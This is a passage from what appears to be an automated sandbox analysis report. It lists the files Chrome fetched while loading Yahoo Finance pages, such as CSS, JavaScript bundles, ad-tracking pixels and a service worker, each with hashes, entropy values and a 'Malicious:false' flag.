                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.730841676486811
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:qqNHnQLiDuAJKyMhWqGYHYOfaK+Cw:qqRQLiDRKsvYH9aKLw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:EBBF7585C063823A02D97415F292F30B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D2BD5E4B0CD41F20E1CBE337601D12439F7C9911
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F6FF295E198F9014F50E977E199014089616A8C48F16F0E73532D60B5524C1C3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:FB0DB4BF4549D73F483EC92B77C7D49FEC2EE5C1E1FEDBF311FED145FB3164D493E604442AFD2AA69D35597F901D252A6F1BDC912CBE9B363869B8F60EE97AE4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:var r=(o=>(o.footer="yfinance:editorialFooterTopics",o.stockStoryTopPics="yfinance:stockStoryTopTickers",o))(r||{});export{r as C};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.408254580031926
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:DQQrVWQ51n:DQQrVr51n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2EE4060FAEACB6F83ED07FF055FC10F5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:7076881D10C3C35B919EBF233ECE73820E315FE7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5541CC5B3298A12D33A363A612ED1A537296D9D74B31E6D8A24A06C3BA67A139
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A42ADF4EA95FA22DE2B00BCCD5F2C4341EC0B861CDE4151546DA2D06BBC58527D8AB6A6A0F9312496E9883E11C3E2E1781DED5F6730751016149BC7A0181E10D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/Typography.CaSb88v6.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.caps.yf-1pqu7qd{text-transform:uppercase}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2299)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2300
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.033727722853696
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:FhlTvaG69RZraT/58wqwDF4dgXrDVMLvn:hs8TmwxDFsIJMbn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:BFB0934E84F7817930BC43C6089DBF48
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9C848BA30FEA83D1C1D7996AE77A0C39A59AAAD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:32881FA8C03BA1820C7D8FFA7AE872CB8CD494525D1F3A3E30EF764E2A2AE288
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:C34A0FDCF70765710421DB27DE5B8A2F708DC414AF0129543158F9FA6F7D19E78D0CD0FA8378E82CB6B2BD580A72BE2AB37A4F8AA67392B1B6C970E2BB96BE88
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/Debug.SsTdzNxF.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:table.yf-1t0ch3l{max-width:100%;border-collapse:collapse;overflow:auto}table.yf-1t0ch3l th{text-align:left}table.yf-1t0ch3l td,table.yf-1t0ch3l th{word-wrap:break-word;padding:var(--space-2)}table.yf-1t0ch3l tr td:first-child{font-weight:var(--font-medium)}table.yf-1t0ch3l tr:nth-child(2n) td{background-color:var(--surface3)}.flex.yf-1sg9oy1.yf-1sg9oy1{display:flex;justify-content:left;margin-bottom:0;padding:var(--space-2);gap:.8rem}.summaryFlex.yf-1sg9oy1.yf-1sg9oy1{display:flex;align-items:center;gap:var(--space-3);position:relative;width:100%}summary.yf-1sg9oy1.yf-1sg9oy1{cursor:pointer}.summaryText.yf-1sg9oy1.yf-1sg9oy1{font-family:var(--font-family);font-weight:var(--font-medium);font-size:var(--font-s)}.perfItem.yf-1sg9oy1 .perfItem{background-color:var(--surface3)}.perfItem.yf-1sg9oy1.yf-1sg9oy1:hover{background-color:var(--table-hover-emph)}.left.yf-1sg9oy1.yf-1sg9oy1{width:25%;word-break:break-all;display:flex;font-weight:var(--font-medium);justify-content:space-between}.righ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cm.g.doubleclick.net/pixel?google_nid=9675309&google_hm=T2lmZjhJdEMxU1lmRmM1&google_gid=CAESED8JyiEahN9WZLumv4WAuPs&google_cver=1&google_push=AXcoOmT9lv6tbQ3qct-nH2M1J0p0JTVa8o9ES3qOdkRXtRIh8-E1jDnu9uJLcGabeeQ6MT_1r_0XuD-4EZiq9LjOWz-UfZ_-F61p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):22971
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.375987138394773
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:9zAth5+sscw10NveS/z03KFp26kowxyKOG9qJHPYerh+m2ZabxJ0:94ZwONvb/zoKFo6kowxyKOO+HPYerh+D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:93423A7A3636346CEA38F6BBC2CC3906
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C0A0804BDB49DF109FE3A41E3C05CDCB3AEDAC8A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:80FE8A0B2F97A31016E7927A7A83B6AEA69E263B58F1596C1DA2198EC87284B6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:638C7988DF0A1B2CD8BA2E30A5DD366EAE09DF1FC728E824FE6DA51BEBC6DE21F3E29E1A13FD4587962E82066A3ECA2BF6F67AC28EA3BAAA4D163F599421BE1E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://www.yahoo.com/service-worker.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/* version: 1.1.53 */.!function(){"use strict";function e(e,t,n,r,i,a,o){try{var c=e[a](o),s=c.value}catch(e){return void n(e)}c.done?t(s):Promise.resolve(s).then(r,i)}function t(t){return function(){var n=this,r=arguments;return new Promise((function(i,a){var o=t.apply(n,r);function c(t){e(o,i,a,c,s,"next",t)}function s(t){e(o,i,a,c,s,"throw",t)}c(void 0)}))}}function n(e,t,n){return(t=function(e){var t=function(e,t){if("object"!=typeof e||!e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===t?String:Number)(e)}(e,"string");return"symbol"==typeof t?t:t+""}(t))in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e}function r(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable})
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1543)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1544
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0311041747692125
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:siyPFLtztnJAcyM5OOcy6V1GOlncyuQVcyLzxeO7wpcyAScybflL06eA6c:si6FLthJByP7ymMhyutyLdfEayYybRCC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5785D230B480BF7BB835D135C419DF64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:65DB57148EDAB791513A462B063679921619E0F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:065639D5D44EC729C7FE97DDCD9964AAC46489E8B772367F95CCCE8CF3643FC1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:71B4B3047D55DE71763AB27FBE8B899A6D1CFB89B9B97664F6E142D8D3BF5EE9DCAAFCCE7BE1F58E655EAB4941A1C0C1814A980AB57F6726BB8803FE3C7A98DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/Dialogv2.Bk0tsnD7.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:dialog.yf-cex3h9.yf-cex3h9{--_dialog-transition:.5s;--_dialog-timing-function:cubic-bezier(.5, -.5, .1, 1.5);transition:opacity var(--_dialog-transition) var(--_dialog-timing-function);animation:yf-cex3h9-scale-down var(--_dialog-transition) var(--_dialog-timing-function) forwards}dialog[open].yf-cex3h9.yf-cex3h9{animation:yf-cex3h9-slide-in-up var(--_dialog-transition) var(--_dialog-timing-function) forwards}dialog.yf-cex3h9.yf-cex3h9,dialog.yf-cex3h9 .dialog-content.yf-cex3h9{border-radius:var(--border-radius-l)}dialog.yf-cex3h9.yf-cex3h9::backdrop{background-color:#000c}dialog.yf-cex3h9 .dialog-content.yf-cex3h9{display:flex;flex-direction:column;align-items:flex-start;justify-content:center;gap:var(--space-4);background-color:var(--surface2a)}dialog.yf-cex3h9 .dialog-content.yf-cex3h9 .close-button{position:absolute;top:4px;right:4px}dialog.yf-cex3h9 .dialog-content.padded.yf-cex3h9{padding:40px var(--size-space-6) var(--size-space-8) var(--size-space-6)}@media only screen and (wid
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 340x179, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):13076
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.966425469787054
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:40Ryiwquza6CfEYKD78DVmbGCEOHbzvlheTlW:4iyjqFfETDADgaC7bzvlh9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:ED38840DEE4E622DF7C4A3D45EEAD469
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E9806FAEA623AA755868F286EC9AB2F48ECC99F5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:93AE2A1DE13696018F8C22F6FC5AA21BE0279701BCE795BCABD71FCA7648E692
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7D958E69A3853BE2852EE60DB065425892D0400F3C8DE5945A299A413B77B5CA46D90783CF2EE17E36856F0DBFF9B674CD4F4A116C7C1E215FF03D60FDBADD32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:......JFIF.......................................................... .... %...%-))-969KKd............................................ .... %...%-))-969KKd........T.."..........4.....................................................................#..4!.]6]~..........(W....L.,2.M..lC)...Jn....pGB!.G......fp...':..Wo.v...:.U/..^.....$V...I..]...l.mtj..Flr.d.Kp..#.@.sW|..x.M..Hv.*D...GV.w\.O.>..G...&.?<.....:v.:.8...<...O%xXn...8@.,.G..D....%&BxhX$6__4eK5.....z,..)..w..9..|q.?<..#..Z'.W405.p.k)...czC..'....+y.D2g:..l..:.O~:.Z.O..nA.~..u.#<.TwA.}..1....._8}...vb..0'..._...;t........:.RI.e.x..Lnl..........,...T...[n...(....J.....+....h.>..)..@.n l..Cbi.w..|z.W.7.m.{f.:.....e.9.]..cV..w.|>.v.].....={b...?Z..|s......2.S...M....z..U.W... ....Hv.qF@.U....N)....x....r.a..Sm.......Xa_.eq.K.uE!..|Lu.k......\/:..Z.;...\e..8*.>.5.S..V.a^} ....3.~ c...Xq..........a<.kq...x..'.F..k.<.i.................m.E..8/.9.]....c:_Sh........xw.y.....&..F}^r....
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1301
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.774650005361297
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:5GWexQlsGTxmV4N7fjvtWNDGWeclss4yV4r13WNB:r03VIiwYVUQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:82DD83A98D216BA3F8537D67723FF769
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:CA0414AF1F7E4B66903862FCB4136624A1CC75CD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8C89F1B9F6E7ABDD0254236F65EFA6F5B49328C12F25151747B8CE4BB49538AD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:ED78FD4DA1D14BFC0B090135C7E04AC951AAA640E01B54919AB053F5E434ACF912F6CE215000F26F54E614F2C73C8310BE76D9B4454DFD5CD3A56D4B22DD6B7C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cdn.taboola.com/static/6b/6b91a1bc-8217-4d34-9774-28dc8fd0cd05.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:@font-face {. font-family: 'Helvetica Neue';. src: url('//cdn.taboola.com/static/impl/eot/HelveticaNeue-Roman.eot');. src: local('Helvetica 55 Roman'), local('HelveticaNeue-Roman'),. url('//cdn.taboola.com/static/impl/eot/HelveticaNeue-Roman.eot?#iefix') format('embedded-opentype'),. url('//cdn.taboola.com/static/impl/woff2/HelveticaNeue-Roman.woff2') format('woff2'),. url('//cdn.taboola.com/static/impl/woff/HelveticaNeue-Roman.woff') format('woff'),. url('//cdn.taboola.com/static/impl/ttf/HelveticaNeue-Roman.ttf') format('truetype');. font-weight: normal;. font-style: normal;. font-display: swap;.}..@font-face {. font-family: 'Helvetica Neue';. src: url('//cdn.taboola.com/static/impl/eot/HelveticaNeue-Bold.eot');. src: local('Helvetica Neue Bold'), local('HelveticaNeue-Bold'),. url('//cdn.taboola.com/static/impl/eot/HelveticaNeue-Bold.eot?#iefix') format('embedded-opentype'),. url('//cdn.taboola.com/static/impl/woff2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1527
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.248147271838624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:Yh0Z9NoV+DgPGsdfGsFDN/VFYrN/W5icpC8xRVVtTljQNGx+q3gQB+Vg4Ybn/Q5s:Yy9NocDgPGWfGeN/VirN/iiwZjn9gg+Y
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D5A93703475E2C0BE639363E62B8563A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D23E4866B7D386C5934E0CE201F942E03E52CC3A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:1819488198294842AF973D8D3DE0B96858F8D48D0DC4F472689399534A01EF78
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AFB17F84D3FA64138F5BB793601E2A18B6BC40FE069B919A860B40D7E4E55D4D62737843A69383DFB148AAE28C7B18AFF3DD434979A8B480B8FB5D39A1E95779
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"assets":{"css":[{"location":"top","value":"/aaq/cprops/colors_1.1.27.min.css","name":"custom-properties","version":"1.1.27"},{"location":"top","value":"/aaq/fp/css/react-wafer-shopping.Shopping.atomic.ltr.d156b541c028fe7d3167b101d15500f6.min.css","name":"react-wafer-shopping.Shopping.atomic"}],"js":[{"location":"bottom","value":"/aaq/wf/wf-core-1.65.1-modern.js","name":"wafer-core","version":"1.65.1"},{"location":"bottom","value":"/aaq/wf/wf-fetch-1.19.1-modern.js","name":"wafer-fetch","version":"1.19.1"}]},"data":{},"html":"<div class=\"wafer-fetch Pos(r)\" id=\"commerce-module-container\" data-wf-body=\"{&quot;config.cpos&quot;:18,&quot;config.enableUserIntent&quot;:false,&quot;config.hiddenCount&quot;:2,&quot;config.listId&quot;:&quot;142c3121-f125-4773-aaf3-3bc2a9c826f1&quot;,&quot;config.openLinksInNewTab&quot;:false,&quot;config.pageContext&quot;:&quot;&quot;,&quot;config.productListId&quot;:&quot;6be44312-a3bc-4c63-891c-d06e455285fc&quot;,&quot;config.renderShoppingProducts&qu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (7531)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):7532
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.363197670162047
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:naiF7rzzTpLh7tWKhp4MWKGOocCZlY5v8wF0pNhq:nJF7PzTpLpAnMkOJCZlY5v8wFp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:97303888B0BCCF2B0F1DFD0991A1EFB0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5ECCAD441A258549A7D03C51034DABEFE31195E1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:918DD66709B049DA825E1171F5EA7DDCB10F92F3C39CE7C9F86BFC39E15D05B0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D11F957B2ECE1F207C06FF469D3A66A8B968EFF8D430A72AB747C98B264E1AEE51DAD9365B04A933C06D1542857F64C0F136ACBB468142D2B206D864FA369B4D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as ae,p as h,b as M,w as re,i as w,j as O,l as K,k as C,x as Q,y as ce,e as oe,d as ne,q as F,H as P,z,A as _e,f as he,B as S,C as ue,c as me,u as de,g as pe,a as be,n as V}from"./scheduler.Dr9AAxFe.js";import{S as ke,i as we,g as ge,a as G,e as ye,t as J}from"./index.DCSmZEjO.js";import{g as je}from"./globals.D0QH3NT1.js";import{e as U}from"./each.BExQfwb4.js";import{g as ve}from"./spread.CgU5AtxT.js";import{g as Ne}from"./commonUtil.CI22_Irn.js";const{document:T}=je;function X(o,l,s){const t=o.slice();return t[13]=l[s],t}function Y(o,l,s){const t=o.slice();return t[16]=l[s],t}function Z(o){let l,s;return{c(){l=oe("link"),this.h()},l(t){l=ne(t,"LINK",{href:!0,rel:!0}),this.h()},h(){F(l,"href",s=typeof o[16]=="string"?o[16]:o[16].value),F(l,"rel","stylesheet")},m(t,e){C(t,l,e)},p(t,e){e&8&&s!==(s=typeof t[16]=="string"?t[16]:t[16].value)&&F(l,"href",s)},d(t){t&&w(l)}}}function A(o){let l,s=o[0].js+"",t;return{c(){l=new P(!1),t=h(),this.h()},l(e){l=z(e,!1),t=h(),this.h()},h(){l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ads.yieldmo.com/sync?pn_id=rc&id=M20TKYGE-G-LVHB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):155
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.657184994033704
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:vPHXUgjTSDNRfXVdYUA+8jTSDNRfXVdeBMl19IVyumOoWRIJ6GeNVAKBWoKJQIsv:nHBWR/VXA+8WR/V9qVk2GeY3XXsv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:BB93DAAC3A880865E2C528F47E99696A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D7AB7CCEBB138232061B9B75671DFC2B8BC30F60
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F19FA742F06B1615667384EE19ECDD5F45BCF41E71CEDB5DB5A1AEC4F5B9824E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9A9B493BE367B7241FE26DD8C9AE2648611460834ECFF122A2C96461F8E3F81333D966947F2D6DCA300BD2CD10F249604AD808C81E0E19015601B31B5EDD0694
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/LeafNewsStream.5uLOVnax.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.news-stream.yf-1napat3{min-height:20rem}.holder.yf-1napat3{min-height:20rem;display:flex;align-items:center;justify-content:center;flex-direction:column}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (788)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.343368280962493
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
